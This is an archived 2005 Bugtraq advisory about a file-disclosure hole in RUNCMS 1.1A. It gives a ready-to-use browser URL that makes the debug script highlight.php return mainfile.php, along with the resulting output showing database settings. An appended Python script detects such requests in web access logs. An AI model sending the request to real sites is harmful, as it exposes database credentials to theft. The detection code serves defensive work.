Message-ID: <E1DCJCd-000FiC-VO@hossein.emami.bistgani>
Date: Fri, 18 Mar 2005 10:15:55 -0500
From: "Majid NT" <NT@...team.com>
To: bugtraq@...urityfocus.com
Subject: runcms highlight.php hole

********************************************
IHS Iran Hackers Sabotage Public advisory
by : NT
NT@...team.com
********************************************

If You Have RUNCMS Installation Address You Can Use highlight.php Hole And Get DataBase Configuration(Name,User,Password)

Tested In RUNCMS 1.1A
-------------------------------------------
Input This Line To Your Browser AddressBar :

http://targetsite/runcmsinstalation/class/debug/highlight.php?file=runcmsinstallationpath\mainfile.php&line=151#151

Like This :

http://localhost/runcms/class/debug/highlight.php?file=c:\phpdev\www\runcms\mainfile.php&line=151#151

You See This Result :

1 <?php
2 // ------------------------------------------------------------------------- //
3 // E-Xoops: Content Management for the Masses //
4 // < http://www.e-xoops.com > //
5 // ------------------------------------------------------------------------- //
6
7 if ( !defined('XOOPS_MAINFILE_INCLUDED') ) {
8 define('XOOPS_MAINFILE_INCLUDED', 1);
9
10 // Physical Path
11 // Physical path to your main RUNCMS directory WITHOUT trailing slash. ( On windows use simple forward slashes & be sure to include the drive letter. c:/myfolder )
12 define('XOOPS_ROOT_PATH', 'c:/phpdev/www/runcms1.1');
13
14 // Virtual Path (URL)
15 // Virtual path to your main RUNCMS directory WITHOUT trailing slash. ( http://www.mysite.com/myfolder )
16 define('XOOPS_URL', 'http://localhost/runcms1.1');
17
18 // Database
19 // Choose the type of database to be used.
20 $xoopsConfig['database'] = 'mysql';
21
22 // Table Prefix
23 // This prefix will be added to all new tables created to avoid name conflict in the database. If you are unsure, just use the default 'runcms'.
24 $xoopsConfig['prefix'] = 'runcms';
25
26 // Database Hostname
27 // Hostname of the database server. ( If you are unsure, 'localhost' works in most cases. )
28 $xoopsConfig['dbhost'] = 'localhost';
29
30 // Database Username
31 // Your database user account on the host. ( Often root when installed on your local machine. )
32 $xoopsConfig['dbuname'] = 'root';
33
34 // Database Password
35 // Password for your database user account.
36 $xoopsConfig['dbpass'] = '';
37
38 // Database Name
39 // The name of database on the host. The installer will attempt to create the database if not exist.
40 $xoopsConfig['dbname'] = 'aaa';
41
42 // Use persistent connection? (Yes=1 No=0)
43 // Default is 'No'. Choose 'No' if you are unsure.
44 $xoopsConfig['db_pconnect'] = 0;
45
46 // Default setup language.
47 $xoopsConfig['default_language'] = 'english';
48
49 include_once(XOOPS_ROOT_PATH.'/include/common.php');
50 } ?>
------------------------------------------
More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12

Source Advisory :
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=14

Found By NT(IHS)
NT@...Team.com
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com
--
www.IHSTEAM.com
www.IHSSECURITY.com
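
A detection check for the request pattern described in the advisory above, added here as an example (it is not part of the original post or of RUNCMS): it scans web access logs for requests to class/debug/highlight.php that carry a file parameter and notes whether mainfile.php was requested and served. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path taken from the advisory; the install prefix differs per site.
SCRIPT_SUFFIX = "/class/debug/highlight.php"

# Assumed log format: Apache/nginx "combined".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def inspect_line(line):
    """Return a finding for a highlight.php request carrying file=, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # Lower-case the decoded path: Windows hosts serve it case-insensitively.
    if not unquote(url.path).lower().endswith(SCRIPT_SUFFIX):
        return None
    # parse_qs percent-decodes values, so %5C and %2F separators are handled.
    files = parse_qs(url.query).get("file")
    if not files:
        return None
    name = files[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "file": files[0],
        "config_requested": name == "mainfile.php",  # holds the DB credentials
        "served": m.group("status") == "200",        # content likely returned
    }

def scan(lines):
    """Collect findings from an iterable of access-log lines."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Mar/2005:10:01:12 -0500] "GET /runcms/index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Mar/2005:10:20:01 -0500] "GET /runcms/class/debug/highlight.php?file=c:%5Cphpdev%5Cwww%5Cruncms%5Cmainfile.php&line=151 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [18/Mar/2005:11:02:44 -0500] "GET /cms/CLASS/debug/Highlight.php?file=%2Fvar%2Fwww%2Fcms%2Fheader.php HTTP/1.1" 403 210 "-" "curl/7.12"',
    '192.0.2.10 - - [18/Mar/2005:11:05:00 -0500] "GET /runcms/class/debug/highlight.php HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with both config_requested and served set means the database credentials in mainfile.php should be treated as exposed and rotated.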